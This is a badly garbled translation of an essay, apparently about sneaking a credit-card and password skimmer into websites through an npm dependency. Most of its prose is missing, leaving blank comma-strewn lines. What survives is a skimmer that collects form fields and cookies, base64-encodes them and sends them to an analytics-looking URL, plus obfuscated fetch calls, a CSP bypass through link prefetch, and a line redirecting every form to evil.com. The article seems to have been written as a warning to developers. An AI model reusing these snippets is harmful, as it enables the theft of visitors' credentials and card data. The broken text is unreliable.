The story of how I steal credit card numbers and passwords from visitors to your sites

Continued: The story of how not to let me steal credit card numbers and passwords from visitors to your sites

We present you a translation of the article of a person who has stolen usernames, passwords and credit card numbers from various sites for several years.


What I want to tell about was in reality. Or maybe my story is only based on real events. And maybe all this is fiction.

Once this week has stood out - an insane time when everyone was worried about security. The feeling was that new vulnerabilities appear daily. It was not so easy for me to pretend that I understand what is happening when close people asked me about it. They were worried about the prospect that they would be hacked, that their data would flow to an unknown destination. All this made me look at many things in a new way.
')
As a result, reluctantly, I decided to put everything straight and tell the whole world how I stole usernames, passwords and credit card numbers from various websites over the past few years. Perhaps you are the administrator or developer of one of them.

How it works

By itself, the code that allows you to steal data from sites is very simple. He feels best when executed on a page that meets the following criteria:

• <form>.
• , input[type="password"], name="cardnumber", name="cvc", .
• «credit card», «checkout», «login», «password», .
  

, blur , submit , :

• , (document.forms.forEach(…)).
• document.cookie.
• , (const payload = btoa(JSON.stringify(sensitiveUserData))).
• , , : https://legit-analytics.com?q=${payload} ( , , ).
  

, - , .

, , 2015-, , , . . , .

Google:

- - , , , .

? XSS , . Chrome .

, , , , , npm-.

NPM

, npm. — , - , - , .

, — , . , , . :


, , .

, , , , . - , .

( , ) - . «, X ».

— ! , , , , . — .

, 23 . — , , . , — , .

— . 6.

120000 , , , - Alexa Top 1000, , .

, , XSS-, . , -.

,

- , , - . .

▍ !

? (, ).

« »: , .

, , IP-, dev, test, qa, uat staging ( \b).

▍ HTTP-!

? 7- 7- . , 95% .

. , , , ( ) . .

- , , . — , , .

, URL , , , .

, , , , . , , , . , .

. , , , , - , , . .

▍ GitHub!

. , : GitHub, — npm.

package.json files , lib, . npm publish npm. lib .gitignore, GitHub . , GitHub.

— npm, npm GitHub, , , /lib/package.min.js — /src/package.js?

, GitHub .

▍ node_modules!

, . , , , , .

, , , . fetch XMLHttpRequest, , . :

const i = 'gfudi';
const k = s => s.split('').map(c => String.fromCharCode(c.charCodeAt() - 1)).join('');
self[k(i)](urlWithYourPreciousData);

«gfudi» — «fetch», . . self — window.

fetch(...):

self['\u0066\u0065\u0074\u0063\u0068'](...)

, , , .

, , , , - fetch. , , new EventSource(urlWithYourPreciousData). , , serviceWorker fetch, . , serviceWorker, EventSource.

▍ !

, . - , (Content Security Policy, CSP) - ? , , CSP:

const linkEl = document.createElement('link');
linkEl.rel = 'prefetch';
linkEl.href = urlWithYourPreciousData;
document.head.appendChild(linkEl);

, CSP () « 100%». , , , 130 . , , .

, . Chrome, CSP .

, CSP (, ) , . , , , CSP , ( «» — GET).

, , prefetch, . , .

, , CSP, ( report-uri). , , , , , .

( ), CSP - .

, .

fetch(document.location.href)
.then(resp => {
  const csp = resp.headers.get('Content-Security-Policy');
  //    ?    ?
});

CSP. , Google CSP, , . connect-src , , « » default-src, , , , .

— , Google.

Amazon, , , CSP. eBay.

Twitter PayPal CSP, . , , , , . , , , default-src. — , . form-action.

, ( ), , , form-action, ( , ) .

Array.from(document.forms).forEach(formEl => formEl.action = `//evil.com/bounce-form`);

. , , PayPal. , .

, , , .

, , Twitter . , .

, , . , .

?

, .

▍ №1: ,

, :


.

▍ №2:

, , ( -), npm. Google Tag Manager, , , — .

, , iFrame.

, , React, 138 npm-. , , , iFrame, , - , JavaScript-, (, , ).

2017- , , . , , . ?

— — , 12- , .

, - , , , . , i, , npm-, . — , . — , , .

, , , 400000 npm-. , , , , .

. npm-, . , , . , ?

? , , , — , ? . (, , , , — ).

( ) , , , , . , . , , .

! , - , ?